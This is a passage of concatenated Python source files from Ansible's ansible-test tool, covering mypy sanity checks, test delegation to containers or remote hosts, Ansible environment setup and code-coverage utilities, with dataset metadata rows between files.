        '--show-error-codes',
        '--no-error-summary',
        # This is a fairly common pattern in our code, so we'll allow it.
        '--allow-redefinition',
        # Since we specify the path(s) to test, it's important that mypy is configured to use the default behavior of following imports.
        '--follow-imports', 'normal',
        # Incremental results and caching do not provide significant performance benefits.
        # It also prevents the use of the --warn-unused-configs option.
        '--no-incremental',
        '--cache-dir', '/dev/null',
        # The platform is specified here so that results are consistent regardless of what platform the tests are run from.
        # In the future, if testing of other platforms is desired, the platform should become part of the test specification, just like the Python version.
        '--platform', 'linux',
        # Despite what the documentation [1] states, the --python-version option does not cause mypy to search for a corresponding Python executable.
        # It will instead use the Python executable that is used to run mypy itself.
        # The --python-executable option can be used to specify the Python executable, with the default being the executable used to run mypy.
        # As a precaution, that option is used in case the behavior of mypy is updated in the future to match the documentation.
        # That should help guarantee that the Python executable providing type hints is the one used to run mypy.
        # [1] https://mypy.readthedocs.io/en/stable/command_line.html#cmdoption-mypy-python-version
        '--python-executable', sys.executable,
        '--python-version', python_version,
        # Below are context specific arguments.
        # They are primarily useful for listing individual 'ignore_missing_imports' entries instead of using a global ignore.
        '--config-file', config_path,
    ]  # fmt: skip
    cmd.extend(context_paths)
    try:
        completed_process = subprocess.run(cmd, env=env, capture_output=True, check=True, text=True)
        stdout, stderr = completed_process.stdout, completed_process.stderr
        if stdout or stderr:
            # Exit code 0 with output is unexpected for mypy here; treat it as a failure.
            raise Exception(f'{stdout=} {stderr=}')
    except subprocess.CalledProcessError as ex:
        # Exit code 1 with stdout and no stderr is how mypy reports findings; anything else is a real failure.
        if ex.returncode != 1 or ex.stderr or not ex.stdout:
            raise
        stdout = ex.stdout
    pattern = re.compile(r'^(?P<path>[^:]*):(?P<line>[0-9]+):((?P<column>[0-9]+):)? (?P<level>[^:]+): (?P<message>.*)$')
    parsed = parse_to_list_of_dict(pattern, stdout or '')
    messages = [SanityMessage(
        level=r['level'],
        message=r['message'],
        path=r['path'],
        line=int(r['line']),
        column=int(r.get('column') or '0'),
        code='',  # extracted from error level messages later
    ) for r in parsed]
    return messages
@dataclasses.dataclass(frozen=True)
class MyPyContext:
    """Context details for a single run of mypy."""

    name: str  # label identifying this context (used to select config/paths for the run)
    paths: list[str]  # paths to check in this context — presumably passed to mypy as targets; confirm against caller
    python_versions: list[str]  # Python versions to test this context under
@dataclasses.dataclass(frozen=True)
class SanityMessage:
    """A single diagnostic produced by a sanity test run."""

    message: str
    path: str
    line: int
    column: int
    level: str
    code: str

    def format(self) -> str:
        """Render this message as ``path:line:column: [code: ]message``."""
        body = f'{self.code}: {self.message}' if self.code else self.message
        return f'{self.path}:{self.line}:{self.column}: {body}'
def parse_to_list_of_dict(pattern: re.Pattern, value: str) -> list[dict[str, t.Any]]:
    """Match every line of *value* against *pattern* and return the named-group dicts.

    Raises an Exception listing every line that failed to match.
    """
    results: list[dict[str, t.Any]] = []
    failures: list[str] = []

    for candidate in value.splitlines():
        found = re.search(pattern, candidate)

        if found is None:
            failures.append(candidate)
        else:
            results.append(found.groupdict())

    if failures:
        raise Exception(f'Pattern {pattern!r} did not match values:\n' + '\n'.join(failures))

    return results
# Script entry point: only run main() when executed directly, not when imported.
if __name__ == '__main__':
    main()
| 8,720
|
Python
|
.py
| 175
| 42.777143
| 155
| 0.675029
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,091
|
__init__.py
|
ansible_ansible/test/lib/ansible_test/__init__.py
|
# Empty __init__.py to allow relative imports to work under mypy.
| 66
|
Python
|
.py
| 1
| 65
| 65
| 0.738462
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,092
|
sanity.pylint.txt
|
ansible_ansible/test/lib/ansible_test/_data/requirements/sanity.pylint.txt
|
# edit "sanity.pylint.in" and generate with: hacking/update-sanity-requirements.py --test pylint
astroid==3.3.5
dill==0.3.9
isort==5.13.2
mccabe==0.7.0
platformdirs==4.3.6
pylint==3.3.1
PyYAML==6.0.2
tomlkit==0.13.2
| 216
|
Python
|
.py
| 9
| 23
| 96
| 0.748792
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,093
|
delegation.py
|
ansible_ansible/test/lib/ansible_test/_internal/delegation.py
|
"""Delegate test execution to another environment."""
from __future__ import annotations
import collections.abc as c
import contextlib
import json
import os
import tempfile
import typing as t
from .constants import (
STATUS_HOST_CONNECTION_ERROR,
)
from .locale_util import (
STANDARD_LOCALE,
)
from .io import (
make_dirs,
)
from .config import (
CommonConfig,
EnvironmentConfig,
IntegrationConfig,
ShellConfig,
TestConfig,
UnitsConfig,
)
from .util import (
SubprocessError,
display,
filter_args,
ANSIBLE_LIB_ROOT,
ANSIBLE_TEST_ROOT,
OutputStream,
)
from .util_common import (
ResultType,
process_scoped_temporary_directory,
)
from .ansible_util import (
get_ansible_bin_path,
)
from .containers import (
support_container_context,
ContainerDatabase,
)
from .data import (
data_context,
)
from .payload import (
create_payload,
)
from .ci import (
get_ci_provider,
)
from .host_configs import (
OriginConfig,
PythonConfig,
)
from .connections import (
Connection,
DockerConnection,
SshConnection,
LocalConnection,
)
from .provisioning import (
HostState,
)
from .content_config import (
serialize_content_config,
)
@contextlib.contextmanager
def delegation_context(args: EnvironmentConfig, host_state: HostState) -> c.Iterator[None]:
    """Context manager for serialized host state during delegation."""
    make_dirs(ResultType.TMP.path)

    # noinspection PyUnusedLocal
    python = host_state.controller_profile.python  # make sure the python interpreter has been initialized before serializing host state
    del python

    with tempfile.TemporaryDirectory(prefix='host-', dir=ResultType.TMP.path) as host_dir:
        # Serialize settings, host state and content config so the delegated process can load them.
        args.host_settings.serialize(os.path.join(host_dir, 'settings.dat'))
        host_state.serialize(os.path.join(host_dir, 'state.dat'))
        serialize_content_config(args, os.path.join(host_dir, 'config.dat'))

        # Expose the serialized data via a path relative to the content root; cleared again on exit.
        args.host_path = os.path.join(ResultType.TMP.relative_path, os.path.basename(host_dir))

        try:
            yield
        finally:
            args.host_path = None
def delegate(args: CommonConfig, host_state: HostState, exclude: list[str], require: list[str]) -> None:
    """Delegate execution of ansible-test to another environment.

    :param exclude: targets to exclude, forwarded to the delegated invocation.
    :param require: targets to require, forwarded to the delegated invocation.
    """
    assert isinstance(args, EnvironmentConfig)  # narrow the type; delegation always operates on an EnvironmentConfig

    with delegation_context(args, host_state):
        if isinstance(args, TestConfig):
            args.metadata.ci_provider = get_ci_provider().code

            make_dirs(ResultType.TMP.path)

            # The metadata file only needs to exist for the duration of the delegated run.
            with tempfile.NamedTemporaryFile(prefix='metadata-', suffix='.json', dir=ResultType.TMP.path) as metadata_fd:
                args.metadata_path = os.path.join(ResultType.TMP.relative_path, os.path.basename(metadata_fd.name))
                args.metadata.to_file(args.metadata_path)

                try:
                    delegate_command(args, host_state, exclude, require)
                finally:
                    args.metadata_path = None  # always clear the path, even on failure
        else:
            delegate_command(args, host_state, exclude, require)
def delegate_command(args: EnvironmentConfig, host_state: HostState, exclude: list[str], require: list[str]) -> None:
    """Delegate execution based on the provided host state."""
    con = host_state.controller_profile.get_origin_controller_connection()
    working_directory = host_state.controller_profile.get_working_directory()
    host_delegation = not isinstance(args.controller, OriginConfig)  # True when the controller is a different host than the origin

    if host_delegation:
        # The payload (source tree) must be copied to the delegated controller.
        if data_context().content.collection:
            content_root = os.path.join(working_directory, data_context().content.collection.directory)
        else:
            content_root = os.path.join(working_directory, 'ansible')

        ansible_bin_path = os.path.join(working_directory, 'ansible', 'bin')

        with tempfile.NamedTemporaryFile(prefix='ansible-source-', suffix='.tgz') as payload_file:
            create_payload(args, payload_file.name)
            con.extract_archive(chdir=working_directory, src=payload_file)
    else:
        content_root = working_directory
        ansible_bin_path = get_ansible_bin_path(args)

    command = generate_command(args, host_state.controller_profile.python, ansible_bin_path, content_root, exclude, require)

    if isinstance(con, SshConnection):
        ssh = con.settings
    else:
        ssh = None

    options = []

    # Only permit --allow-destructive injection when every involved host is a managed (disposable) one.
    if isinstance(args, IntegrationConfig) and args.controller.is_managed and all(target.is_managed for target in args.targets):
        if not args.allow_destructive:
            options.append('--allow-destructive')

    with support_container_context(args, ssh) as containers:  # type: t.Optional[ContainerDatabase]
        if containers:
            options.extend(['--containers', json.dumps(containers.to_dict())])

        # Run unit tests unprivileged to prevent stray writes to the source tree.
        # Also disconnect from the network once requirements have been installed.
        if isinstance(args, UnitsConfig) and isinstance(con, DockerConnection):
            pytest_user = 'pytest'

            writable_dirs = [
                os.path.join(content_root, ResultType.JUNIT.relative_path),
                os.path.join(content_root, ResultType.COVERAGE.relative_path),
            ]

            con.run(['mkdir', '-p'] + writable_dirs, capture=True)
            con.run(['chmod', '777'] + writable_dirs, capture=True)
            con.run(['chmod', '755', working_directory], capture=True)
            con.run(['useradd', pytest_user, '--create-home'], capture=True)

            # First pass: install requirements only (still privileged, still networked).
            con.run(insert_options(command, options + ['--requirements-mode', 'only']), capture=False)

            container = con.inspect()
            networks = container.get_network_names()

            if networks is not None:
                for network in networks:
                    try:
                        con.disconnect_network(network)
                    except SubprocessError:
                        display.warning(
                            'Unable to disconnect network "%s" (this is normal under podman). '
                            'Tests will not be isolated from the network. Network-related tests may '
                            'misbehave.' % (network,)
                        )
            else:
                display.warning('Network disconnection is not supported (this is normal under podman). '
                                'Tests will not be isolated from the network. Network-related tests may misbehave.')

            # Second pass (below) skips requirements and runs as the unprivileged user.
            options.extend(['--requirements-mode', 'skip'])

            con.user = pytest_user

        success = False
        status = 0

        try:
            # When delegating, preserve the original separate stdout/stderr streams, but only when the following conditions are met:
            # 1) Display output is being sent to stderr. This indicates the output on stdout must be kept separate from stderr.
            # 2) The delegation is non-interactive. Interactive mode, which generally uses a TTY, is not compatible with intercepting stdout/stderr.
            # The downside to having separate streams is that individual lines of output from each are more likely to appear out-of-order.
            output_stream = OutputStream.ORIGINAL if args.display_stderr and not args.interactive else None
            con.run(insert_options(command, options), capture=False, interactive=args.interactive, output_stream=output_stream)
            success = True
        except SubprocessError as ex:
            status = ex.status
            raise
        finally:
            if host_delegation:
                download_results(args, con, content_root, success)

    if not success and status == STATUS_HOST_CONNECTION_ERROR:
        for target in host_state.target_profiles:
            target.on_target_failure()  # when the controller is delegated, report failures after delegation fails
def insert_options(command: list[str], options: list[str]) -> list[str]:
    """Return a copy of ``command`` with ``options`` inserted before the first ``--`` option."""
    updated: list[str] = []
    pending = list(options) if options else None

    for token in command:
        if pending and token.startswith('--'):
            updated.extend(pending)
            pending = None

        updated.append(token)

    return updated
def download_results(args: EnvironmentConfig, con: Connection, content_root: str, success: bool) -> None:
    """Download results from a delegated controller.

    :param success: whether the delegated run succeeded — controls whether download failures are fatal.
    """
    remote_results_root = os.path.join(content_root, data_context().content.results_path)
    local_test_root = os.path.dirname(os.path.join(data_context().content.root, data_context().content.results_path))

    remote_test_root = os.path.dirname(remote_results_root)
    remote_results_name = os.path.basename(remote_results_root)

    make_dirs(local_test_root)  # make sure directory exists for collections which have no tests

    # Results are transferred as a single archive, excluding the TMP result directory.
    with tempfile.NamedTemporaryFile(prefix='ansible-test-result-', suffix='.tgz') as result_file:
        try:
            con.create_archive(chdir=remote_test_root, name=remote_results_name, dst=result_file, exclude=ResultType.TMP.name)
        except SubprocessError as ex:
            if success:
                raise  # download errors are fatal if tests succeeded

            # surface download failures as a warning here to avoid masking test failures
            display.warning(f'Failed to download results while handling an exception: {ex}')
        else:
            result_file.seek(0)  # rewind before handing the archive to the local extraction

            local_con = LocalConnection(args)
            local_con.extract_archive(chdir=local_test_root, src=result_file)
def generate_command(
    args: EnvironmentConfig,
    python: PythonConfig,
    ansible_bin_path: str,
    content_root: str,
    exclude: list[str],
    require: list[str],
) -> list[str]:
    """Generate the command necessary to delegate ansible-test.

    The result has the shape: /usr/bin/env VAR=... {python} {ansible-test} {filtered options}.
    """
    cmd = [os.path.join(ansible_bin_path, 'ansible-test')]
    cmd = [python.path] + cmd  # run ansible-test explicitly under the selected interpreter

    env_vars = dict(
        ANSIBLE_TEST_CONTENT_ROOT=content_root,
    )

    if isinstance(args.controller, OriginConfig):
        # Expose the ansible and ansible_test library directories to the Python environment.
        # This is only required when delegation is used on the origin host.
        library_path = process_scoped_temporary_directory(args)

        os.symlink(ANSIBLE_LIB_ROOT, os.path.join(library_path, 'ansible'))
        os.symlink(ANSIBLE_TEST_ROOT, os.path.join(library_path, 'ansible_test'))

        env_vars.update(
            PYTHONPATH=library_path,
        )
    else:
        # When delegating to a host other than the origin, the locale must be explicitly set.
        # Setting of the locale for the origin host is handled by common_environment().
        # Not all connections support setting the locale, and for those that do, it isn't guaranteed to work.
        # This is needed to make sure the delegated environment is configured for UTF-8 before running Python.
        env_vars.update(
            LC_ALL=STANDARD_LOCALE,
        )

    # Propagate the TERM environment variable to the remote host when using the shell command.
    if isinstance(args, ShellConfig):
        term = os.environ.get('TERM')

        if term is not None:
            env_vars.update(TERM=term)

    # sorted for a deterministic command line
    env_args = ['%s=%s' % (key, env_vars[key]) for key in sorted(env_vars)]

    cmd = ['/usr/bin/env'] + env_args + cmd

    cmd += list(filter_options(args, args.host_settings.filtered_args, exclude, require))

    return cmd
def filter_options(
    args: EnvironmentConfig,
    argv: list[str],
    exclude: list[str],
    require: list[str],
) -> c.Iterable[str]:
    """Return an iterable that filters out unwanted CLI options and injects new ones as requested."""
    # Each entry is (option, number of option arguments, replacement).
    # The option (and its arguments) are stripped from argv; a falsy replacement means "drop only",
    # True re-emits the bare option, a str emits one argument, a list emits the option once per item.
    replace: list[tuple[str, int, t.Optional[t.Union[bool, str, list[str]]]]] = [
        ('--truncate', 1, str(args.truncate)),
        ('--color', 1, 'yes' if args.color else 'no'),
        ('--redact', 0, False),
        ('--no-redact', 0, not args.redact),
        ('--host-path', 1, args.host_path),
    ]

    if isinstance(args, TestConfig):
        replace.extend([
            ('--changed', 0, False),
            ('--tracked', 0, False),
            ('--untracked', 0, False),
            ('--ignore-committed', 0, False),
            ('--ignore-staged', 0, False),
            ('--ignore-unstaged', 0, False),
            ('--changed-from', 1, False),
            ('--changed-path', 1, False),
            ('--metadata', 1, args.metadata_path),
            ('--exclude', 1, exclude),
            ('--require', 1, require),
            ('--base-branch', 1, False),
        ])

    pass_through_args: list[str] = []

    for arg in filter_args(argv, {option: count for option, count, replacement in replace}):
        # Everything from the first bare '--' onward is passed through untouched, at the very end.
        if arg == '--' or pass_through_args:
            pass_through_args.append(arg)
            continue

        yield arg

    # Re-inject the replacement options after the filtered original arguments.
    for option, _count, replacement in replace:
        if not replacement:
            continue

        if isinstance(replacement, bool):
            yield option
        elif isinstance(replacement, str):
            yield from [option, replacement]
        elif isinstance(replacement, list):
            for item in replacement:
                yield from [option, item]

    yield from args.delegate_args
    yield from pass_through_args
| 13,418
|
Python
|
.py
| 294
| 37.068027
| 148
| 0.654501
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,094
|
ansible_util.py
|
ansible_ansible/test/lib/ansible_test/_internal/ansible_util.py
|
"""Miscellaneous utility functions and classes specific to ansible cli tools."""
from __future__ import annotations
import json
import os
import shutil
import typing as t
from .constants import (
ANSIBLE_BIN_SYMLINK_MAP,
SOFT_RLIMIT_NOFILE,
)
from .util import (
common_environment,
ApplicationError,
ANSIBLE_LIB_ROOT,
ANSIBLE_TEST_ROOT,
ANSIBLE_TEST_DATA_ROOT,
ANSIBLE_ROOT,
ANSIBLE_SOURCE_ROOT,
ANSIBLE_TEST_TOOLS_ROOT,
MODE_FILE_EXECUTE,
raw_command,
verified_chmod,
)
from .util_common import (
create_temp_dir,
ResultType,
intercept_python,
get_injector_path,
)
from .config import (
IntegrationConfig,
PosixIntegrationConfig,
EnvironmentConfig,
CommonConfig,
)
from .data import (
data_context,
)
from .python_requirements import (
install_requirements,
)
from .host_configs import (
PythonConfig,
)
from .thread import (
mutex,
)
def parse_inventory(args: EnvironmentConfig, inventory_path: str) -> dict[str, t.Any]:
    """Return a dict parsed from the given inventory file."""
    command = ['ansible-inventory', '-i', inventory_path, '--list']
    environment = ansible_environment(args)

    stdout = intercept_python(args, args.controller_python, command, environment, capture=True, always=True)[0]

    return json.loads(stdout)
def get_hosts(inventory: dict[str, t.Any], group_name: str) -> dict[str, dict[str, t.Any]]:
    """Return a dict of hosts from the specified group in the given inventory."""
    variables_by_host = inventory.get('_meta', {}).get('hostvars', {})
    names = inventory.get(group_name, {}).get('hosts', [])

    # Hosts without hostvars are still included, with empty variables.
    return {name: variables_by_host.get(name, {}) for name in names}
def ansible_environment(args: CommonConfig, color: bool = True, ansible_config: t.Optional[str] = None) -> dict[str, str]:
    """Return a dictionary of environment variables to use when running Ansible commands.

    :param color: allow color output (combined with args.color).
    :param ansible_config: explicit ansible.cfg path; defaults to the command's own config.
    """
    env = common_environment()
    path = env['PATH']

    ansible_bin_path = get_ansible_bin_path(args)

    # Make sure the ansible entry points take precedence on PATH (idempotent).
    if not path.startswith(ansible_bin_path + os.path.pathsep):
        path = ansible_bin_path + os.path.pathsep + path

    if not ansible_config:
        # use the default empty configuration unless one has been provided
        ansible_config = args.get_ansible_config()

    if not args.explain and not os.path.exists(ansible_config):
        raise ApplicationError('Configuration not found: %s' % ansible_config)

    ansible = dict(
        ANSIBLE_PYTHON_MODULE_RLIMIT_NOFILE=str(SOFT_RLIMIT_NOFILE),
        # NOTE(review): parses as ('%s' % 'true') if ... else 'false' due to precedence; the '%s' is redundant but the result is still 'true'/'false'
        ANSIBLE_FORCE_COLOR='%s' % 'true' if args.color and color else 'false',
        ANSIBLE_FORCE_HANDLERS='true',  # allow cleanup handlers to run when tests fail
        ANSIBLE_HOST_PATTERN_MISMATCH='error',  # prevent tests from unintentionally passing when hosts are not found
        ANSIBLE_INVENTORY='/dev/null',  # force tests to provide inventory
        ANSIBLE_DEPRECATION_WARNINGS='false',
        ANSIBLE_HOST_KEY_CHECKING='false',
        ANSIBLE_RETRY_FILES_ENABLED='false',
        ANSIBLE_CONFIG=ansible_config,
        ANSIBLE_LIBRARY='/dev/null',
        ANSIBLE_DEVEL_WARNING='false',  # Don't show warnings that CI is running devel
        PYTHONPATH=get_ansible_python_path(args),
        PAGER='/bin/cat',
        PATH=path,
        # give TQM worker processes time to report code coverage results
        # without this the last task in a play may write no coverage file, an empty file, or an incomplete file
        # enabled even when not using code coverage to surface warnings when worker processes do not exit cleanly
        ANSIBLE_WORKER_SHUTDOWN_POLL_COUNT='100',
        ANSIBLE_WORKER_SHUTDOWN_POLL_DELAY='0.1',
        # ansible-test specific environment variables require an 'ANSIBLE_TEST_' prefix to distinguish them from ansible-core env vars defined by config
        ANSIBLE_TEST_ANSIBLE_LIB_ROOT=ANSIBLE_LIB_ROOT,  # used by the coverage injector
    )

    if isinstance(args, IntegrationConfig) and args.coverage:
        # standard path injection is not effective for the persistent connection helper, instead the location must be configured
        # it only requires the injector for code coverage
        # the correct python interpreter is already selected using the sys.executable used to invoke ansible
        ansible.update(
            _ANSIBLE_CONNECTION_PATH=os.path.join(get_injector_path(), 'ansible_connection_cli_stub.py'),
        )

    if isinstance(args, PosixIntegrationConfig):
        ansible.update(
            ANSIBLE_PYTHON_INTERPRETER='/set/ansible_python_interpreter/in/inventory',  # force tests to set ansible_python_interpreter in inventory
        )

    env.update(ansible)

    if args.debug:
        env.update(
            ANSIBLE_DEBUG='true',
            ANSIBLE_LOG_PATH=os.path.join(ResultType.LOGS.name, 'debug.log'),
        )

    if data_context().content.collection:
        env.update(
            ANSIBLE_COLLECTIONS_PATH=data_context().content.collection.root,
        )

    if data_context().content.is_ansible:
        env.update(configure_plugin_paths(args))

    return env
def configure_plugin_paths(args: CommonConfig) -> dict[str, str]:
    """Return environment variables with paths to plugins relevant for the current command.

    Only applies to integration test commands; other commands get an empty dict.
    """
    if not isinstance(args, IntegrationConfig):
        return {}

    support_path = os.path.join(ANSIBLE_SOURCE_ROOT, 'test', 'support', args.command)

    # provide private copies of collections for integration tests
    collection_root = os.path.join(support_path, 'collections')

    env = dict(
        ANSIBLE_COLLECTIONS_PATH=collection_root,
    )

    # provide private copies of plugins for integration tests
    plugin_root = os.path.join(support_path, 'plugins')

    plugin_list = [
        'action',
        'become',
        'cache',
        'callback',
        'cliconf',
        'connection',
        'filter',
        'httpapi',
        'inventory',
        'lookup',
        'netconf',
        # 'shell' is not configurable
        'strategy',
        'terminal',
        'test',
        'vars',
    ]

    # most plugins follow a standard naming convention
    plugin_map = dict(('%s_plugins' % name, name) for name in plugin_list)

    # these plugins do not follow the standard naming convention
    plugin_map.update(
        doc_fragment='doc_fragments',
        library='modules',
        module_utils='module_utils',
    )

    # produces variables such as ANSIBLE_ACTION_PLUGINS, ANSIBLE_LIBRARY, ...
    env.update(dict(('ANSIBLE_%s' % key.upper(), os.path.join(plugin_root, value)) for key, value in plugin_map.items()))

    # only configure directories which exist
    env = dict((key, value) for key, value in env.items() if os.path.isdir(value))

    return env
@mutex
def get_ansible_bin_path(args: CommonConfig) -> str:
    """
    Return a directory usable for PATH, containing only the ansible entry points.
    If a temporary directory is required, it will be cached for the lifetime of the process and cleaned up at exit.
    """
    # The result is cached as an attribute on the function itself; @mutex serializes the first computation.
    try:
        return get_ansible_bin_path.bin_path  # type: ignore[attr-defined]
    except AttributeError:
        pass

    if ANSIBLE_SOURCE_ROOT:
        # when running from source there is no need for a temporary directory since we already have known entry point scripts
        bin_path = os.path.join(ANSIBLE_ROOT, 'bin')
    else:
        # when not running from source the installed entry points cannot be relied upon
        # doing so would require using the interpreter specified by those entry points, which conflicts with using our interpreter and injector
        # instead a temporary directory is created which contains only ansible entry points
        # symbolic links cannot be used since the files are likely not executable
        bin_path = create_temp_dir(prefix='ansible-test-', suffix='-bin')
        bin_links = {os.path.join(bin_path, name): get_cli_path(path) for name, path in ANSIBLE_BIN_SYMLINK_MAP.items()}

        if not args.explain:
            for dst, src in bin_links.items():
                shutil.copy(src, dst)
                verified_chmod(dst, MODE_FILE_EXECUTE)

    get_ansible_bin_path.bin_path = bin_path  # type: ignore[attr-defined]

    return bin_path
def get_cli_path(path: str) -> str:
    """Return the absolute path to the CLI script from the given path which is relative to the `bin` directory of the original source tree layout."""
    rewrites = (
        ('../lib/ansible/', ANSIBLE_LIB_ROOT),
        ('../test/lib/ansible_test/', ANSIBLE_TEST_ROOT),
    )

    for prefix, root in rewrites:
        if not path.startswith(prefix):
            continue

        return os.path.join(root, path[len(prefix):])

    raise RuntimeError(path)
# noinspection PyUnusedLocal
@mutex
def get_ansible_python_path(args: CommonConfig) -> str:
    """
    Return a directory usable for PYTHONPATH, containing only the ansible package.
    If a temporary directory is required, it will be cached for the lifetime of the process and cleaned up at exit.
    """
    del args  # not currently used

    # Cached as a function attribute; @mutex serializes the first computation.
    try:
        return get_ansible_python_path.python_path  # type: ignore[attr-defined]
    except AttributeError:
        pass

    if ANSIBLE_SOURCE_ROOT:
        # when running from source there is no need for a temporary directory to isolate the ansible package
        python_path = os.path.dirname(ANSIBLE_LIB_ROOT)
    else:
        # when not running from source the installed directory is unsafe to add to PYTHONPATH
        # doing so would expose many unwanted packages on sys.path
        # instead a temporary directory is created which contains only ansible using a symlink
        python_path = create_temp_dir(prefix='ansible-test-')

        os.symlink(ANSIBLE_LIB_ROOT, os.path.join(python_path, 'ansible'))

    get_ansible_python_path.python_path = python_path  # type: ignore[attr-defined]

    return python_path
class CollectionDetail:
    """Collection detail."""

    def __init__(self) -> None:
        # version string reported for the collection, or None when no version is available
        self.version: t.Optional[str] = None
class CollectionDetailError(ApplicationError):
    """An error occurred retrieving collection detail."""

    def __init__(self, reason: str) -> None:
        # Preserve the original message format exactly.
        super().__init__(f'Error collecting collection detail: {reason}')

        self.reason = reason
def get_collection_detail(python: PythonConfig) -> CollectionDetail:
    """Return collection detail.

    Runs the collection_detail.py helper under the given interpreter and parses its JSON output.
    :raises CollectionDetailError: when the helper reports an error.
    """
    collection = data_context().content.collection
    directory = os.path.join(collection.root, collection.directory)

    stdout = raw_command([python.path, os.path.join(ANSIBLE_TEST_TOOLS_ROOT, 'collection_detail.py'), directory], capture=True)[0]
    result = json.loads(stdout)
    error = result.get('error')

    if error:
        raise CollectionDetailError(error)

    version = result.get('version')

    detail = CollectionDetail()
    detail.version = str(version) if version is not None else None  # normalize to a string, keep None as "unknown"

    return detail
def run_playbook(
    args: EnvironmentConfig,
    inventory_path: str,
    playbook: str,
    capture: bool,
    variables: t.Optional[dict[str, t.Any]] = None,
) -> None:
    """Run the specified playbook using the given inventory file and playbook variables.

    :param playbook: playbook file name, resolved relative to the bundled playbooks directory.
    :param variables: extra vars passed to ansible-playbook as JSON via -e.
    """
    playbook_path = os.path.join(ANSIBLE_TEST_DATA_ROOT, 'playbooks', playbook)
    cmd = ['ansible-playbook', '-i', inventory_path, playbook_path]

    if variables:
        cmd.extend(['-e', json.dumps(variables)])

    if args.verbosity:
        cmd.append('-%s' % ('v' * args.verbosity))  # e.g. -vvv for verbosity 3

    install_requirements(args, args.controller_python, ansible=True)  # run_playbook()

    env = ansible_environment(args)
    intercept_python(args, args.controller_python, cmd, env, capture=capture)
| 11,690
|
Python
|
.py
| 259
| 38.76834
| 152
| 0.692084
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,095
|
coverage_util.py
|
ansible_ansible/test/lib/ansible_test/_internal/coverage_util.py
|
"""Utility code for facilitating collection of code coverage when running tests."""
from __future__ import annotations
import dataclasses
import os
import sqlite3
import tempfile
import typing as t
from .config import (
IntegrationConfig,
SanityConfig,
TestConfig,
)
from .io import (
write_text_file,
make_dirs,
open_binary_file,
)
from .util import (
ApplicationError,
InternalError,
COVERAGE_CONFIG_NAME,
remove_tree,
sanitize_host_name,
str_to_version,
)
from .data import (
data_context,
)
from .util_common import (
ExitHandler,
intercept_python,
ResultType,
)
from .host_configs import (
DockerConfig,
HostConfig,
OriginConfig,
PosixRemoteConfig,
PosixSshConfig,
PythonConfig,
)
from .constants import (
SUPPORTED_PYTHON_VERSIONS,
CONTROLLER_PYTHON_VERSIONS,
)
from .thread import (
mutex,
)
@dataclasses.dataclass(frozen=True)
class CoverageVersion:
    """Details about a coverage version and its supported Python versions."""

    coverage_version: str  # version of the 'coverage' package, e.g. '7.6.1'
    schema_version: int  # coverage data file schema version (see get_coverage_file_schema_version)
    min_python: tuple[int, int]  # lowest supported Python version (inclusive)
    max_python: tuple[int, int]  # highest supported Python version (inclusive)
# self_check() at the bottom of this module verifies every supported Python version maps to exactly one entry.
COVERAGE_VERSIONS = (
    # IMPORTANT: Keep this in sync with the ansible-test.txt requirements file.
    CoverageVersion('7.6.1', 7, (3, 8), (3, 13)),
)
"""
This tuple specifies the coverage version to use for Python version ranges.
"""

CONTROLLER_COVERAGE_VERSION = COVERAGE_VERSIONS[0]
"""The coverage version supported on the controller."""
class CoverageError(ApplicationError):
    """Exception caused while attempting to read a coverage file."""

    def __init__(self, path: str, message: str) -> None:
        self.path = path  # path of the coverage file that could not be read
        self.message = message  # description of the specific failure

        super().__init__(f'Error reading coverage file "{os.path.relpath(path)}": {message}')
def get_coverage_version(version: str) -> CoverageVersion:
    """Return the coverage version to use with the specified Python version."""
    parsed = str_to_version(version)
    matches = [candidate for candidate in COVERAGE_VERSIONS if candidate.min_python <= parsed <= candidate.max_python]

    if not matches:
        raise InternalError(f'Python {version} has no matching entry in COVERAGE_VERSIONS.')

    if len(matches) > 1:
        raise InternalError(f'Python {version} has multiple matching entries in COVERAGE_VERSIONS.')

    return matches[0]
def get_coverage_file_schema_version(path: str) -> int:
    """
    Return the schema version from the specified coverage file.
    SQLite based files report schema version 1 or later.
    JSON based files are reported as schema version 0.
    An exception is raised if the file is not recognized or the schema version cannot be determined.
    """
    with open_binary_file(path) as file_obj:
        header = file_obj.read(16)  # both known magic prefixes fit within the first 16 bytes

    if header.startswith(b'!coverage.py: '):
        # legacy JSON format identified by its text banner
        return 0

    if header.startswith(b'SQLite'):
        # SQLite file magic; read the actual schema version from the database
        return get_sqlite_schema_version(path)

    raise CoverageError(path, f'Unknown header: {header!r}')
def get_sqlite_schema_version(path: str) -> int:
    """Return the schema version from a SQLite based coverage file.

    :raises CoverageError: when the database cannot be queried or the stored version is not a positive int.
    """
    try:
        connection = sqlite3.connect(path)

        try:
            cursor = connection.cursor()
            cursor.execute('select version from coverage_schema')
            schema_version = cursor.fetchmany(1)[0][0]
        finally:
            # A sqlite3 connection used as a context manager only wraps a transaction;
            # it does NOT close the connection. Close explicitly to avoid leaking a
            # file handle for every coverage file inspected.
            connection.close()
    except Exception as ex:
        raise CoverageError(path, f'SQLite error: {ex}') from ex

    if not isinstance(schema_version, int):
        raise CoverageError(path, f'Schema version is {type(schema_version)} instead of {int}: {schema_version}')

    if schema_version < 1:
        raise CoverageError(path, f'Schema version is out-of-range: {schema_version}')

    return schema_version
def cover_python(
    args: TestConfig,
    python: PythonConfig,
    cmd: list[str],
    target_name: str,
    env: dict[str, str],
    capture: bool,
    data: t.Optional[str] = None,
    cwd: t.Optional[str] = None,
) -> tuple[t.Optional[str], t.Optional[str]]:
    """Run a command while collecting Python code coverage.

    NOTE: when coverage is enabled, the caller-provided ``env`` dict is mutated in place.
    """
    if args.coverage:
        env.update(get_coverage_environment(args, target_name, python.version))

    return intercept_python(args, python, cmd, env, capture, data, cwd)
def get_coverage_platform(config: HostConfig) -> str:
    """Return the platform label for the given host config.

    The label becomes part of coverage output file names (see get_coverage_environment).
    """
    if isinstance(config, PosixRemoteConfig):
        platform = f'remote-{sanitize_host_name(config.name)}'
